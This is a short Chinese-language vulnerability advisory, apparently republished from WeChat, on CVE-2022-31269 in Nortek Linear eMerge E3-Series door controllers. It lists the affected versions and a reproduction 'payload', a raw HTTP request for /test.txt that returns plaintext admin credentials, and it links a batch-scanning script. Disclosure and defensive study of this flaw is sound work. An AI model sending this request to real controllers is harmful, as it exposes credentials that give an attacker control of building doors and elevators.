(CVE-2022-31269)Nortek Control Linear eMerge E3-Series 信息泄露
2022-8-15 08:2:38 Author: 才疏学浅的H6(查看原文) 阅读量:103 收藏

01

风险说明 

       Nortek Control Linear eMerge E3-Series是美国Nortek Control公司的一种门禁控制器。可指定人员在指定时间可以使用哪些门进出指定地点。

Nortek Control Linear eMerge E3-Series 存在安全漏洞,该漏洞源于管理凭据以明文形式存在于/test.txt中,这导致未经身份验证的攻击者获取到管理凭据以访问管理仪表盘进而控制整个建筑的门、电梯等

02

影响版本 

- 0.32-07p、0.32-07e、0.32-28f、0.32-09c

03

漏洞复现 

payload:

GET /test.txt HTTP/1.1Host: ipUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

批量检测脚本:

https://github.com/Henry4E36/CVE-2022-31269

04

修复建议 

目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:

https://linear-solutions.com

E N D

本文章仅用于学习交流,不得用于非法用途

原文:
https://www.henry4e36.top/index.php/archives/93.html
参考:
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202208-2451

文章来源: http://mp.weixin.qq.com/s?__biz=MzkyMjE3MjEyNQ==&mid=2247485892&idx=1&sn=68258203c448c0657ac8fcbd7b651e74&chksm=c1f92676f68eaf609859696a8e7017bc82eb3d63fa53286adcec390678ed7afb57aa633d11d1#rd
如有侵权请联系:admin#unsafe.sh